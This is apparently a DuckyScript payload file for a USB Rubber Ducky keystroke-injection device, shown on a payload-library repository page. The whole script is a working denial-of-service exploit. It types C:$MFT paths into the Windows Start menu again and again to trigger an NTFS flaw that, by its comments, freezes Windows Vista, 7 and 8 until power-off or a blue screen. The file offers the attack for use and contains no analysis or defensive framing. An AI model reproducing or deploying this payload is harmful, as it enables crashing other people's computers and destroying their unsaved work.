Path: blob/master/payloads/library/execution/$MFT-Duck-Crasher/payload.txt
3018 views
REM Title: $MFT-Duck-Crasher1REM Author: JonnyBanana2REM A Simple Script for Rubber Ducky which Exploits Windows $MFT Vulnerability.3REM $MFT is used by NTFS systems to manage some metadata. Works on windows 7, 8 and vista, dont work on windows 10.4REM I think work on Xp and earlier. The system crash lasts until the machine is switched off, or until the blue screen of death appears5REM works on w7 - w8 - Vista (and i think xp and earlier too)6REM it uses a high delay to support even older computers7DELAY 10008CONTROL ESCAPE9DELAY 50010STRING C:$MFT11DELAY 50012ENTER13DELAY 70014REM the 2nd enter is to close the error15ENTER16DELAY 50017CONTROL ESCAPE18DELAY 50019STRING C:$MFT\12320DELAY 50021ENTER22DELAY 70023ENTER24DELAY 50025CONTROL ESCAPE26DELAY 50027STRING C:$MFT28DELAY 50029ENTER30DELAY 70031ENTER32DELAY 50033CONTROL ESCAPE34DELAY 50035STRING C:$MFT\12336DELAY 50037ENTER38DELAY 70039ENTER404142